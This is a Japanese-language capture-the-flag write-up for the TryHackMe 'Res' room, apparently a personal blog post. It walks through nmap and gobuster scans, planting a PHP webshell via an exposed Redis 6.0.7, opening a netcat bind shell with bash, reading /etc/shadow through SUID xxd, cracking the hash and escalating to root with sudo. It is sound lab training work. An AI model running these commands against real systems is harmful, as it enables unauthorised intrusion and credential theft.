More than 1 year has passed since last update.

TryHackMe Writeup:Res

Posted at 2024-03-05

はじめに

今回も難易度Easyのルーム，ResのWriteupを書いていきたいと思います．

いつも通りにポートスキャンです．
sudo nmap -p- -vv -T4 -O -sV 10.10.52.251

80のhttpと6379のredisが開いているみたいですね．今回はredisがテーマなんですかね？

sudo gobuster dir -u 10.10.52.251 -w /usr/share/wordlists/dirb/common.txt -o gobuster_dir.log

今回は何もなさそうです．

Apacheのデフォルトページが出てきました．
とりあえず前やったルームと同じ感じで脆弱性がないか調査してみます．
redis 6.0.7 vulnerabilitiesで検索してみます．
かなりいろいろ出てきました．
こういうのとかありました．

これだとSSHも必要そうだけど今回は開いていないからどうするか…

これのPHP webshellとかが使えそうですね．

今回はApacheなのでパスが間違ってますね．

10.10.52.251/shell.phpにアクセスしてみます．

PHPの基本情報が表示されるみたいですね．

PHP webshellの詳細の作り方については以下を参考にしました．ありがとうございました．

これでURLにコマンドを入力することで実行できるようになるみたいです．

上記の画像のコマンドで待ち受ける場合だと上手くいきません．
netcatのオプションを見てみます．

-eオプションで接続後に実行するコマンドを指定できるみたいです．

http://10.10.52.251/shell.php?cmd=nc -e /bin/bash -nlvp 1234
最終的にはこのコマンドでシェルとれるみたいです．

findコマンドで検索します．
find / -name user.txt
/home/vianka/user.txtにあります．

/etc/passwdを見てみます．

/etc/shadowも見れないみたいです．
suid権限が設定されているものがないか調べてみます．
find / -perm -u=s

xxdコマンドが使えるみたいですね．
xxdコマンドとは16進数にダンプしたり戻したりできるコマンドのことです．

おなじみのGTFObinsで調べてみます．

LFILE=/etc/shadow
xxd "$LFILE" | xxd -r

これでviankaのユーザアカウントパスワードのハッシュ値が見れました．

これをjohn the ripperで解析していきます．

＊本編とは関係ないですが
python3 -c "import pty;pty.spawn('/bin/bash')"でシェルの入力が楽になるみたいですね．

su viankaでユーザーviankaに切り替えてsudo -lします．

全て実行できるのでsudo su でOK
/root/root.txtにあります．

PHPなどの知識はほとんどないのでもう少し勉強したいですね．
やりたいことが多すぎて大変です…